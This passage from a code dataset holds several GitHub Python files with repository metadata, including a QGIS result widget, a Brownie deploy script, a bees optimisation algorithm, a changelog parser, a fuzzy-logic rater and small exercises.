get_ui_string(\"widget.result.export.file.open\"),\r\n \".\", \r\n self.ui.cb_export_format.currentText())\r\n if not filename.isNull():\r\n self.ui.txt_export_select_path.setText(filename) \r\n \r\n @logUICall\r\n @pyqtSlot(str)\r\n def exportFormatChanged(self, selected_val):\r\n \"\"\"\r\n event handler for cb_export_format \r\n - update selected file after format change\r\n \"\"\"\n self.ui.txt_export_select_path.setText(\"\")\r\n self.export_format = self.EXPORT_FORMATS[str(selected_val)]\r\n \r\n @logUICall\r\n @pyqtSlot()\r\n def exportData(self):\r\n \"\"\" \r\n event handler for btn_export\r\n - do export data \r\n \"\"\"\r\n export_path = str(self.ui.txt_export_select_path.text())\r\n if export_path == \"\":\r\n logUICall.log(get_ui_string(\"app.error.path.is.null\"), logUICall.WARNING)\r\n return\r\n self.app.exportResults(self.export_format, export_path)\r\n\r\n \r\n @logUICall\r\n @pyqtSlot(QPoint, QObject)\r\n def showInfo(self, point, mouseButton):\r\n \"\"\"\r\n event handler for toolInfo\r\n @see QGIS tutorial for detail\r\n point-polygon search on currently selected layer \r\n \"\"\"\r\n cur_layer_name = self.ui.cb_layer_selector.currentText()\n if cur_layer_name.isEmpty():\n return\r\n try:\r\n cur_layer_idx = self.LAYER_NAMES.index(cur_layer_name)\r\n cur_layer = self.map_layers[cur_layer_idx]\r\n \r\n # if layer is not in same projection as map canvas\r\n # need to project query point\r\n if cur_layer.crs() != self.canvas.mapRenderer().destinationCrs():\r\n transform = QgsCoordinateTransform(self.canvas.mapRenderer().destinationCrs(), cur_layer.crs())\r\n point = transform.transform(point)\r\n \r\n # do query\r\n provider = cur_layer.dataProvider() \r\n provider.rewind()\r\n feature = QgsFeature()\r\n colonIndexes = provider.attributeIndexes()\r\n \r\n # search using point as center of rectangle polygon\r\n search_buffer_x = self.canvas.extent().width() * self.SEARCH_BUFFER / self.canvas.width()\r\n search_buffer_y = self.canvas.extent().height() * self.SEARCH_BUFFER / self.canvas.height()\r\n provider.select(colonIndexes,\r\n QgsRectangle(point.x()-search_buffer_x,\r\n point.y()-search_buffer_y,\r\n point.x()+search_buffer_x,\r\n point.y()+search_buffer_y),\r\n True)\r\n # get selected and display in result detail dialog box \r\n selected = [] \r\n while provider.nextFeature(feature): \r\n # for polygons, only show geometry containing query point \r\n if cur_layer.geometryType() == QGis.Polygon: \r\n if feature.geometry() is not None and not feature.geometry().contains (point):\r\n continue\r\n selected.append(feature.attributeMap())\r\n\r\n if len(selected)>0:\r\n # display result if exists\r\n if cur_layer_idx == self.EXPOSURE:\r\n self.dlgResultDetail.showExposureData(provider.fields(), selected) \r\n else:\r\n self.dlgResultDetail.showInfoData(provider.fields(), selected)\r\n self.dlgResultDetail.exec_()\r\n else:\r\n logUICall.log(get_ui_string(\"widget.result.info.notfound\"), logUICall.WARNING)\r\n except Exception as err:\r\n # point-in-polygon search is not critical, continue on error \n logUICall.log(str(err), logUICall.WARNING)\r\n \r\n # public methods\r\n ###############################\r\n def set_project(self, project):\r\n ''' set project to preview. force refresh view on set''' \r\n self._project = project\r\n if project is None:\r\n return\n self.refreshView()\n self.canvas.zoomToFullExtent()\n logUICall.log(\"Project preview initialized sucessfully\", logUICall.INFO)\r\n \r\n def get_project(self):\r\n return self._project\r\n \r\n # property access to project\r\n project = property(get_project, set_project)\r\n \r\n def refreshView(self):\n ''' reload all QGIS layers in currently defined project '''\r\n if self._project is None:\r\n return\n \n # display layers if exists \r\n if self._project.fp_file is not None and exists(self._project.fp_file):\r\n if self.map_layers[self.FOOTPRINT] is None or self.map_layers[self.FOOTPRINT].source() != self._project.fp_file: \r\n self.showDataLayer(self.FOOTPRINT, load_shapefile(self._project.fp_file, 'footprint'))\r\n else: \r\n self.removeDataLayer(self.FOOTPRINT)\r\n \r\n if self._project.zone_file is not None and exists(self._project.zone_file):\r\n if self.map_layers[self.ZONES] is None or self.map_layers[self.ZONES].source() != self._project.zone_file:\r\n self.showDataLayer(self.ZONES, load_shapefile(self._project.zone_file, 'zones'))\r\n else: \r\n self.removeDataLayer(self.ZONES)\r\n \r\n if self._project.survey_file is not None and exists(self._project.survey_file):\r\n if getattr(self._project, 'survey', None) is None:\r\n self._project.load_survey()\r\n self.showDataLayer(self.SURVEY, self._project.survey)\r\n else: \r\n self.removeDataLayer(self.SURVEY)\r\n \n if self._project.popgrid_file is not None and exists(self._project.popgrid_file):\n if getattr(self._project, 'popgrid', None) is None:\n self.showDataLayer(self.POP_GRID, load_shapefile(self._project.popgrid_file, 'popgrid'))\n else: \n self.removeDataLayer(self.POP_GRID)\n \r\n # set export options\r\n for idx, export_format in enumerate(self.EXPORT_FORMATS.values()):\r\n if export_format == self._project.export_type:\r\n self.ui.cb_export_format.setCurrentIndex(idx)\r\n self.ui.txt_export_select_path.setText(self._project.export_path)\n \n # refreshResult contains refresh call to update all layers currently loaded\r\n self.refreshResult()\r\n\r\n def refreshResult(self):\n ''' reload result QGIS layer and data quality reports in currently defined project '''\r\n exposure = getattr(self._project, 'exposure', None) \n if exposure is not None:\r\n self.showDataLayer(self.EXPOSURE, exposure)\r\n has_result = True \r\n else:\r\n self.removeDataLayer(self.EXPOSURE)\r\n has_result = False\r\n \r\n if has_result:\r\n # build quality report \r\n report_lines = []\r\n if self._project.operator_options.has_key(\"proc.extrapolation\"):\r\n proc_option = self._project.operator_options[\"proc.extrapolation\"]\r\n if proc_option == ExtrapolateOptions.RandomWalk:\r\n proc_method = get_ui_string(\"widget.result.dq.method\", get_ui_string(\"dlg.options.ep.random\"))\r\n elif proc_option == ExtrapolateOptions.Fraction:\r\n proc_method = get_ui_string(\"widget.result.dq.method\", get_ui_string(\"dlg.options.ep.fraction\"))\r\n elif proc_option == ExtrapolateOptions.FractionRounded:\r\n proc_method = get_ui_string(\"widget.result.dq.method\", get_ui_string(\"dlg.options.ep.fraction.rounded\"))\r\n else:\r\n proc_method = get_ui_string(\"widget.result.dq.method\", get_ui_string(\"dlg.options.ep.random\")) \r\n report_lines.append(proc_method)\r\n report_lines.append('')\r\n \r\n # total tests\r\n report_lines.append(get_ui_string('widget.result.dq.total_tests', len(self._project.quality_reports.keys())))\r\n report_lines.append('')\r\n \r\n # detail for each test\r\n for key, report in self._project.quality_reports.iteritems():\r\n report_lines.append(get_ui_string('widget.result.dq.tests.%s' % key)) \r\n for title, value in report.iteritems():\r\n report_lines.append( get_ui_string('widget.result.dq.tests.%s.%s' % (key, title), value) )\r\n report_lines.append('') \r\n self.ui.txt_dq_test_details.setText(\"\\n\".join(report_lines))\r\n\r\n\r\n self.ui.btn_export.setEnabled(has_result)\r\n self.ui.widget_dq_test.setVisible(has_result)\r\n self.ui.txt_export_select_path.setEnabled(has_result)\r\n self.ui.btn_export_select_path.setEnabled(has_result)\r\n self.ui.cb_export_format.setEnabled(has_result) \r\n\n # this call refresh all layers currently loaded \n self.refreshLayers() \n\r\n @logUICall\r\n def closeResult(self):\n ''' remove from map result QGIS layer and reset quality report display '''\r\n self.canvas.setLayerSet([]) # call necessary to remove all layers to avoid disconnect errors \n self.removeDataLayer(self.EXPOSURE)\n self.refreshLayers()\n self.ui.txt_dq_test_details.setText(\"\")\n \r\n @logUICall\r\n def closeAll(self):\n ''' remove from map all QGIS layer in currently defined project '''\r\n self.ui.cb_layer_selector.clear()\r\n try:\n self.canvas.setLayerSet([]) # call necessary to remove all layers to avoid disconnect errors \r\n for i in range(5):\r\n self.removeDataLayer(i) \n self.ui.txt_dq_test_details.setText(\"\")\n self.refreshLayers()\r\n except: \r\n pass # exception will is thrown when registry is empty\r\n \r\n # internal helper methods\r\n ###############################\r\n def showDataLayer(self, index, layer):\r\n \"\"\" display given QGIS layer on map \"\"\"\r\n try:\r\n # add to QGIS registry and refresh view\n if self.map_layers[index] is not None:\n self.removeDataLayer(index)\n self.map_layers[index] = layer\n self.registry.addMapLayer(layer)\n layer.setRendererV2(self.map_layer_renderer[index]) \n except:\r\n pass\r\n\r\n def removeDataLayer(self, index):\n \"\"\" remove from map the layer identified with index \"\"\"\r\n layer = self.map_layers[index]\r\n self.map_layers[index] = None \r\n if layer is not None: \r\n try:\r\n self.registry.removeMapLayer(layer.getLayerID(), False)\n del layer \r\n except:\r\n pass # do nothing if it fails. probably already deleted\r\n\r\n def findFeatureExtentByAttribute(self, layer, field, value):\n \"\"\" \n find extent of all objects in QGIS layer matching condition \"field=value\" \n \"\"\"\r\n fidx = layer_field_index(layer, field)\r\n if fidx == -1:\r\n return None\r\n xmin, xmax, ymin, ymax = 180, -180, 90, -90\r\n extent = QgsRectangle(xmin, ymin, xmax, ymax)\r\n need_transform = layer.crs() != self.canvas.mapRenderer().destinationCrs()\r\n if need_transform:\r\n transform = QgsCoordinateTransform(layer.crs(), self.canvas.mapRenderer().destinationCrs())\r\n for feature in layer_features(layer):\r\n if str(value) == feature.attributeMap()[fidx].toString():\r\n f_extent = feature.geometry().boundingBox()\r\n if need_transform:\r\n f_extent = transform.transform(f_extent)\r\n xmin = min(f_extent.xMinimum(), xmin)\r\n xmax = max(f_extent.xMaximum(), xmax)\r\n ymin = min(f_extent.yMinimum(), ymin)\r\n ymax = max(f_extent.yMaximum(), ymax)\r\n extent.set (xmin, ymin, xmax, ymax)\r\n return extent\r\n\r\n def zoomToLayer(self, layer):\r\n \"\"\" zoom canvas to extent of given layer \"\"\"\r\n try:\r\n lyr_extent = layer.extent() \r\n if layer.crs() != self.canvas.mapRenderer().destinationCrs():\r\n transform = QgsCoordinateTransform(layer.crs(), self.canvas.mapRenderer().destinationCrs())\r\n lyr_extent = transform.transform(lyr_extent)\r\n self.zoomToExtent(lyr_extent)\r\n except:\r\n pass\r\n \r\n def zoomToExtent(self, extent):\n \"\"\" zoom canvas to given extent \"\"\"\r\n try:\r\n self.canvas.setExtent(extent)\r\n self.canvas.zoomByFactor(1.1)\n except:\r\n self.mapZoomFull()\r\n \r\n def refreshLayers(self):\r\n \"\"\" refresh all layers in canvas \"\"\"\r\n # add each layer according to order\r\n layerSet = []\n self.ui.cb_layer_selector.clear()\r\n for idx, lyr in enumerate(self.map_layers):\r\n if lyr is not None:\r\n layerSet.append(QgsMapCanvasLayer(lyr))\r\n self.ui.cb_layer_selector.addItem(self.LAYER_NAMES[idx])\n if len(layerSet) > 0: \r\n self.canvas.setLayerSet(layerSet)\n \n","repo_name":"ImageCatInc/sidd","sub_path":"ui/wdg_result.py","file_name":"wdg_result.py","file_ext":"py","file_size_in_byte":28964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11028258045","text":"from brownie import accounts\nfrom brownie.project import get_loaded_projects\n\nfrom bot.conf import settings\n\n\ndef main():\n project = get_loaded_projects()[0]\n acct = accounts.add(settings.DEPLOYER_PRIVATE_KEY)\n project.LiquidateVault.deploy(\n settings.WETH_ADDRESS,\n settings.TCAP_ADDRESS,\n settings.SOLO_MARGIN_ADDRESS,\n settings.SUSHISWAP_ROUTER_ADDRESS,\n {\"from\": acct}\n )\n","repo_name":"cryptexfinance/liquidation-bot","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"1566427659","text":"from random import getrandbits, randint\n\nsick_days = randint(0, 10)\n\nprint(sick_days)\ncalling_in_sick = False\n\nwhile not calling_in_sick and sick_days > 0:\n actually_sick = bool(getrandbits(1))\n kinda_sick = bool(getrandbits(1))\n dont_feel_like_it = bool(getrandbits(1))\n if actually_sick and sick_days > 0:\n calling_in_sick = True\n sick_days -= 1\n elif kinda_sick and dont_feel_like_it:\n calling_in_sick = True\n sick_days -= 1\n\n print(f'Are you sick : {calling_in_sick}')\n\nelse:\n print(f'It remain {sick_days} days of sickeness')","repo_name":"abdallawi/TestPython","sub_path":"praktijkTest/Opdracht1.py","file_name":"Opdracht1.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7476842032","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# 输入某年某月某日,判断这一天是这一年的第几天?\nyear = int(input('year: \\n'))\nmonth = int(input('month: \\n'))\nday = int(input('day: \\n'))\nmonths = (0,31,59,90,120,151,181,212,243,273,304,334)\n\nif 0< month <= 12:\n sum = months[month -1]\nelse:\n print('data error')\nsum += day\n\nleap = 0\nif(year % 400 == 0) or ((year % 4 == 0) and (year % 100 != 0)):\n leap = 1\nif(leap == 1) and ( month > 2):\n sum += 1\n\nprint('这是第{}天'.format(sum))","repo_name":"clearJSer/python-study","sub_path":"练习4.py","file_name":"练习4.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74336939573","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 20 20:13:15 2020\n\n@author: mandarupasani\n\nprojecteuler.net\nproblem 19 : Counting Sundays\n\"\"\"\n\nn_months = [31,\n 28,\n 31,\n 30,\n 31,\n 30,\n 31,\n 31,\n 30,\n 31,\n 30,\n 31]\nlp_months = n_months.copy()\nlp_months[1] = 29\ndays = [\"mon\",\n \"tue\",\n \"wed\",\n \"thu\",\n \"fri\",\n \"sat\",\n \"sun\"]\n\ndef leap_chk(year):\n \"\"\"1\n A function to check whether a year is leap or not.\n\n Parameters\n ----------\n year : int\n A year from christ's birth.\n\n Returns\n -------\n bool\n True if leap, false otherwise\n\n Example\n -------\n >>> leap_chk(1996)\n True\n >>> leap_chk(2005)\n False\n \"\"\"\n if (year % 4) == 0:\n if (year % 100) == 0:\n if (year % 400) == 0:\n return True\n else:\n return False\n else:\n return True\n else:\n return False\n\nsunday_count = 0\ninit_day = 'tue'\n\nfor year in range(1901,1906):\n # print(init_day)\n if (leap_chk(year)):\n months = lp_months\n else:\n months = n_months\n\n for i in range(len(months)):\n nxt_day = days[(days.index(init_day) + (months[i] % 7)) % 7]\n # init_day = nxt_day\n if (nxt_day == 'sun'):\n sunday_count += 1\n\n if (leap_chk(year)):\n init_day = days[(days.index(init_day) + 2) % 7]\n else:\n init_day = days[(days.index(init_day) + 1) % 7]\n\n","repo_name":"mandarvu/project_euler","sub_path":"python3/prob19.py","file_name":"prob19.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35086213688","text":"with open(\"timestamps.txt\") as f:\n data = f.read()\n\ndata = data.split('\\n')\ndataUniq = set(data)\n\ndataDic = {}\nfor dat in dataUniq:\n if dat:\n dat = dat.strip().split()\n dataDic[int(dat[0])] = dat[1] + \" \" + dat[2]\n\nsortedDic = dict(sorted(dataDic.items(), key=lambda item: item[0]))\n\nnewStr =''\nfor k,v in sortedDic.items():\n newStr += str(k) + \" \" + v + \"\\n\"\n\n# to see visually which one is missing\nfor i in range(47, 125): \n print(i,sortedDic.get(i, 'YOOOOOOOOOOOOOO'))\n\nwith open(\"tsSorted.txt\", 'w') as f:\n f.write(newStr)","repo_name":"firozzer/DarknetDiariesJokes","sub_path":"archived/sortTimestampts.py","file_name":"sortTimestampts.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15711935312","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass BeesAlgorithm:\n \"\"\" Bees algorithm optimization \"\"\"\n def __init__(self, landscape, n, m, e, nep, nsp, ngh):\n \"\"\"\n Initializes the algorithm.\n\n Args:\n landscape (Landscape): Fitness plane where bees interact.\n n (int): Number of scout bees.\n m (int): Number of sites selected (out of n).\n e (int): Number of best sites (out of m).\n nep (int): Number of bees recruited e.\n nsp (int): Number of bees recruited m.\n ngh (int): Initial size patches.\n \"\"\"\n self.landscape = landscape\n self.n = n\n self.m = m\n self.e = e\n self.nep = nep\n self.nsp = nsp\n self.ngh = ngh\n self.best_fitness = None\n self.positions = np.zeros((self.n, 2))\n self.fitness = np.zeros((self.n, ))\n self._initialize_position()\n self._calculate_fitness()\n\n def _initialize_position(self):\n \"\"\" Initializes position of bee randomly in landscape. \"\"\"\n min_x, max_x, min_y, max_y = self.landscape.limits\n self.positions[:, 0] = np.random.uniform(min_x, max_x, size=(self.n, ))\n self.positions[:, 1] = np.random.uniform(min_y, max_y, size=(self.n, ))\n\n def _calculate_fitness(self):\n \"\"\" Computes the fitness for the bees. \"\"\"\n for idx in range(self.n):\n pos = self.positions[idx, :]\n self.fitness[idx] = self.landscape.evaluate_fitness(pos)\n self.best_fitness = max(self.fitness)\n\n def update_positions(self, recruiters, best):\n \"\"\"\n Updates position of bees.\n\n Args:\n recruiters (np.array): Recruiters bees.\n best (np.array): Best bees.\n \"\"\"\n min_x, max_x, min_y, max_y = self.landscape.limits\n assert len(recruiters) > len(best), \"Number of scouts is lesser than number of optimal solutions.\"\n ratio_recruiter = len(recruiters) // len(best)\n for current_num, current_pos in enumerate(best):\n current_recruiters = (recruiters[current_num * ratio_recruiter: (current_num + 1) * ratio_recruiter]\n if (current_num + 1) * ratio_recruiter <= len(best) else recruiters[current_num * ratio_recruiter:])\n for idx in current_recruiters:\n self.positions[idx, :] = self.positions[current_pos, :] + 2 * self.ngh * np.random.random(size=(1, 2)) - self.ngh\n self._calculate_fitness()\n\n def recruit_scouts(self):\n \"\"\" Recruits scout bees accordint to parameters. \"\"\"\n best_fitness_all = self.fitness.argsort()\n recruiters_e = best_fitness_all[:self.nep] # Recruiters in best positions\n recruiters_m_e = best_fitness_all[self.nep:self.nsp + self.nep] # Recruiters in m - e positions\n best_e = best_fitness_all[self.nsp + self.nep + self.m - self.e:]\n best_m_e = best_fitness_all[self.nsp + self.nep: self.nsp + self.nep + self.m - self.e]\n self.update_positions(recruiters_e, best_e)\n self.update_positions(recruiters_m_e, best_m_e)\n return (recruiters_e, best_e, recruiters_m_e, best_m_e)\n\n def abandon_locations(self, recruiters_e, best_e, recruiters_m_e, best_m_e):\n \"\"\"\n Relocates bees again in the landscape (except best).\n\n Args:\n recruiters_e (np.array): Recruiters on best bees.\n best_e (np.array): Best bees in landscape.\n recruiters_m_e (np.array): Recruiters on rest of the best bees.\n best_m_e (np.array): Rest of bees bees in the landscape.\n \"\"\"\n min_x, max_x, min_y, max_y = self.landscape.limits\n # Abandon best places leaving a single scout\n patch_e = np.concatenate([recruiters_e, best_e])\n best_fitness_patch_e = self.fitness[patch_e].argsort()[::-1]\n self.positions[patch_e[best_fitness_patch_e][1:], 0] = np.random.uniform(min_x, max_x, size=(len(best_fitness_patch_e[1:]), ))\n self.positions[patch_e[best_fitness_patch_e][1:], 1] = np.random.uniform(min_y, max_y, size=(len(best_fitness_patch_e[1:]), ))\n # Abandon rest also leaving a single scout\n patch_m_e = np.concatenate([recruiters_m_e, best_m_e])\n best_fitness_patch_m_e = self.fitness[patch_m_e].argsort()[::-1]\n self.positions[patch_m_e[best_fitness_patch_m_e][1:], 0] = np.random.uniform(min_x, max_x, size=(len(best_fitness_patch_m_e[1:]), ))\n self.positions[patch_m_e[best_fitness_patch_m_e][1:], 1] = np.random.uniform(min_y, max_y, size=(len(best_fitness_patch_m_e[1:]), ))\n self._calculate_fitness()\n\n def plot(self):\n \"\"\" Plots bees in landscape. \"\"\"\n best_fitness_idx = self.fitness.argsort()[::-1][:self.e]\n for idx in range(self.n):\n if idx in best_fitness_idx:\n circle = plt.Circle(self.positions[idx, :], radius=self.ngh, color=\"gold\", alpha=0.5)\n plt.gca().add_patch(circle)\n plt.plot(self.positions[idx, 0], self.positions[idx, 1], \"darkorange\", marker=\"*\")\n else:\n circle = plt.Circle(self.positions[idx, :], radius=self.ngh, color=\"r\", alpha=0.1)\n plt.gca().add_patch(circle)\n plt.plot(self.positions[idx, 0], self.positions[idx, 1], \"r*\")\n plt.title(f\"Best fitness: {self.best_fitness:.2f}\")\n","repo_name":"sgalella/BeesAlgorithm","sub_path":"bees_algorithm/bees_algorithm.py","file_name":"bees_algorithm.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24209742151","text":"# Day 7: Handy Haversacks: https://adventofcode.com/2020/day/7#part2\nimport re\nfrom os import path\n\nTHIS_DIR = path.dirname(path.realpath(__file__))\nfile_path = path.join(THIS_DIR, 'input.txt')\nwith open(file_path) as f:\n bag_list = f.read().splitlines()\n\nbag_dict = {}\n\nfor line in bag_list:\n container_bags, content = line.split(\"contain\")\n content_list = re.findall(r'(\\d)([\\w\\s]+)bag.', content)\n container_color = container_bags.split(\"bags\")[0].strip()\n contained_bags = [(num, bag.strip()) for num, bag in content_list]\n bag_dict[container_color] = contained_bags\n\n# for k,v in bag_dict.items():\n# print(k,v)\n\n# shiny gold [('5', 'light black'), ('3', 'mirrored yellow'), ('5', 'muted plum')]\n\n# 1: Recursion\n# Check this for recursion in for loop: https://stackoverflow.com/questions/4795527/how-recursion-works-inside-a-for-loop#:~:text=Just%20because%20the%20function%20happens,functions%20again%2C%20and%20so%20on.&text=For%20recursion%2C%20it's%20helpful%20to,stack%20structure%20in%20your%20mind.\n# My earlier solution doesn't consider the container bags, it only considers the contained bags\n\ndef find_bags(bags):\n if len(bags) == 0:\n return 1\n\n part_sum = 0\n for num, bag in bags:\n n = int(num)\n val = find_bags(bag_dict[bag]) # By separating into this, I was able to get the answer\n if val != 1:\n part_sum += n + n * val \n else:\n # Initially was part_sum += n *find_bags(bag_dict[bag])\n part_sum += n * val\n # print(bag, n, part_sum)\n\n return part_sum # Return must be some value\n\n# print(bag_dict['shiny gold'])\n\nprint(find_bags(bag_dict['shiny gold']))\n","repo_name":"nuthanc/advent-of-code","sub_path":"2020/7/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16480540947","text":"#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost \n\"\"\"\nfrom cocktail.iteration import first\nfrom cocktail import schema\nfrom woost.extensions.locations.location import Location\n\n\nclass CountryReference(schema.Reference):\n\n def __init__(self, *args, **kwargs):\n kwargs[\"type\"] = Location\n kwargs.setdefault(\"default_order\", \"location_name\")\n\n constraints = kwargs.get(\"relation_constraints\")\n if constraints is None:\n constraints = {}\n kwargs[\"relation_constraints\"] = constraints\n\n constraints[\"location_type\"] = \"country\"\n\n schema.Reference.__init__(self, *args, **kwargs)\n\n def normalization(self, value):\n\n if isinstance(value, str):\n country = first(\n Location.select({\n \"location_type\": \"country\",\n \"code\": value.upper()\n })\n )\n if country is not None:\n value = country\n\n return value\n\n","repo_name":"marticongost/woost.extensions.locations","sub_path":"woost/extensions/locations/countryreference.py","file_name":"countryreference.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71322008694","text":"import re\nfrom collections import namedtuple\nfrom typing import List, Optional\n\nimport commonmark\n\n\nclass Changelog(object):\n def __init__(self, name: str, releases=None) -> None:\n self.name = name\n self.releases = releases or []\n\n\nclass Section(object):\n def __init__(self, name: str) -> None:\n self.name = name\n\n\nclass Release(object):\n def __init__(self, name: str, release_date=None, sections=None) -> None:\n self.name = name\n self.release_date = release_date\n self.sections = sections or []\n\n def find_section(self, name: str) -> Optional[Section]:\n for section in self.sections:\n if section.name.lower() == name.lower():\n return section\n return None\n\n\nHeading = namedtuple(\"Heading\", [\"level\", \"title\"])\n\n\ndef ast_to_headings(node) -> List[Heading]:\n \"\"\"\n Walks AST and returns a list of headings\n \"\"\"\n\n level = None\n walker = node.walker()\n headings = []\n\n event = walker.nxt()\n while event is not None:\n entering = event[\"entering\"]\n node = event[\"node\"]\n\n if node.t == \"heading\":\n if entering:\n level = node.level\n else:\n level = None\n elif level:\n if node.t != \"text\":\n raise Exception(\n \"Unexpected node {}, only text may be within a heading.\".format(\n node.t\n )\n )\n\n headings.append(Heading(level=level, title=node.literal))\n\n event = walker.nxt()\n\n return headings\n\n\ndef ast_to_changelog(node) -> Changelog:\n changelog = None\n headings = ast_to_headings(node)\n\n if len(headings) > 0 and headings[0].level == 1:\n changelog = Changelog(headings[0].title)\n headings = headings[1:]\n else:\n raise Exception(\n \"Changelog does not start with a level 1 heading, including the changelog name.\"\n )\n\n if any(map(lambda h: h.level == 1, headings)):\n raise Exception(\"Changelog has multiple level 1 headings.\")\n\n release = None\n last_heading_level = 1\n\n for heading in headings:\n if heading.level == 2:\n if release:\n changelog.releases.append(release)\n\n match = re.match(r\"(\\S+) \\([\\d\\-]+\\)\", heading.title)\n if match:\n release = Release(match.groups()[0])\n else:\n release = Release(heading.title)\n elif heading.level == 3:\n if not release:\n raise Exception(\n \"Level 3 heading was not found within a release (level 2 heading).\"\n )\n\n release.sections.append(Section(heading.title))\n\n if heading.level > last_heading_level + 1:\n raise Exception(\n \"Changelog heading level jumps from level {} to level {}. Must jump one level per heading.\".format(\n last_heading_level, heading.level\n )\n )\n last_heading_level = heading.level\n\n if release:\n changelog.releases.append(release)\n\n return changelog\n\n\ndef parse_changelog(path: str) -> Changelog:\n with open(path, \"r\") as fp:\n parser = commonmark.Parser()\n ast = parser.parse(fp.read())\n return ast_to_changelog(ast)\n\n\ndef extract_last_changelog(path: str) -> Optional[str]:\n with open(path, \"r\") as fp:\n parser = commonmark.Parser()\n content = fp.read()\n\n changelog = ast_to_changelog(parser.parse(content))\n\n if len(changelog.releases) == 0:\n raise Exception(\"No changelog releases\")\n\n if len(changelog.releases) > 1:\n current = changelog.releases[0]\n previous = changelog.releases[1]\n\n with open(path, \"r\") as fp:\n content = fp.read()\n\n pattern = r\"\\#\\# {}(.*\\n)([\\n\\S\\s]*)\\#\\# {}\".format(\n re.escape(current.name), re.escape(previous.name)\n )\n result = re.search(pattern, content, re.MULTILINE)\n return result.group(2).strip()\n elif len(changelog.releases) == 1:\n current = changelog.releases[0]\n\n with open(path, \"r\") as fp:\n content = fp.read()\n\n pattern = r\"\\#\\# {}(.*\\n)([\\n\\S\\s]*)\".format(re.escape(current.name))\n result = re.search(pattern, content, re.MULTILINE)\n return result.group(2).strip()\n\n return None\n","repo_name":"kylef/maintain","sub_path":"maintain/changelog.py","file_name":"changelog.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"73767460854","text":"from simpful import FuzzySystem, FuzzySet, Triangular_MF, Trapezoidal_MF, LinguisticVariable\n\n\ndef func():\n fuzzy_set1 = FuzzySet(function=Triangular_MF(a=0, b=0, c=5), term=\"poor\")\n fuzzy_set2 = FuzzySet(function=Triangular_MF(a=0, b=5, c=10), term=\"average\")\n fuzzy_set3 = FuzzySet(function=Triangular_MF(a=5, b=10, c=10), term=\"good\")\n return [fuzzy_set1, fuzzy_set2, fuzzy_set3]\n\n\ndef fuzzy_logic(writing_score: int, acting_score: int, impact_score: int):\n fs = FuzzySystem(show_banner=False)\n\n # Define fuzzy sets and linguistic variables\n fs.add_linguistic_variable(\"Writing\", LinguisticVariable(func(), universe_of_discourse=[0, 10]))\n fs.add_linguistic_variable(\"Acting\", LinguisticVariable(func(), universe_of_discourse=[0, 10]))\n fs.add_linguistic_variable(\"Impact\", LinguisticVariable(func(), universe_of_discourse=[0, 10]))\n\n # Define output fuzzy sets and linguistic variable\n q_1 = FuzzySet(function=Triangular_MF(a=0, b=0, c=2.5), term=\"poor\")\n q_2 = FuzzySet(function=Triangular_MF(a=0, b=2.5, c=5), term=\"average\")\n q_3 = FuzzySet(function=Triangular_MF(a=2.5, b=5, c=7.5), term=\"good\")\n q_4 = FuzzySet(function=Trapezoidal_MF(a=5, b=7.5, c=10, d=10), term=\"amazing\")\n fs.add_linguistic_variable(\"Quality\", LinguisticVariable([q_1, q_2, q_3, q_4], universe_of_discourse=[0, 10]))\n\n R1 = \"IF (Writing IS poor) THEN (Quality IS poor)\"\n R2 = \"IF (Writing IS average) AND (Acting IS average) THEN (Quality IS average)\"\n R3 = \"IF (Writing IS average) AND (Acting IS good) THEN (Quality IS average)\"\n R4 = \"IF (Writing IS good) AND (Acting IS average) THEN (Quality IS average)\"\n R5 = \"IF (Writing IS good) AND (Acting IS good) THEN (Quality IS good)\"\n R6 = \"IF (Writing IS good) AND (Acting IS good) AND (Impact IS good) THEN (Quality IS amazing)\"\n fs.add_rules([R1, R2, R3, R4, R5, R6])\n\n # Set antecedents values\n fs.set_variable(\"Writing\", writing_score)\n fs.set_variable(\"Acting\", acting_score)\n fs.set_variable(\"Impact\", impact_score)\n\n # Perform Mamdani inference and print output\n quality_score = fs.Mamdani_inference([\"Quality\"])\n return int(quality_score[\"Quality\"])\n","repo_name":"EvelynVoce/AI-Chatbot","sub_path":"fuzzy.py","file_name":"fuzzy.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4347928183","text":"import matplotlib.pyplot as plt\nfrom sys import argv\n\n\n\ndef plottheThing(sourceFile):\n plt.clf()\n with open(sourceFile+\".txt\") as f:\n data = f.read()\n errors = [float(value) for value in data.split(\"\\n\") if value]\n plt.plot(range(len(errors)), errors, 'ro')\n plt.axis([0, len(errors), 0, 100])\n plt.title(\"Error from \"+sourceFile)\n plt.ylabel(\"percent error\")\n plt.xlabel(\"iteration\")\n plt.savefig(sourceFile + \"plot\" + '.png', dpi=300)\n plt.show\n\n\nif __name__ == \"__main__\":\n if len(argv) > 1:\n for arg in argv[1:]:\n 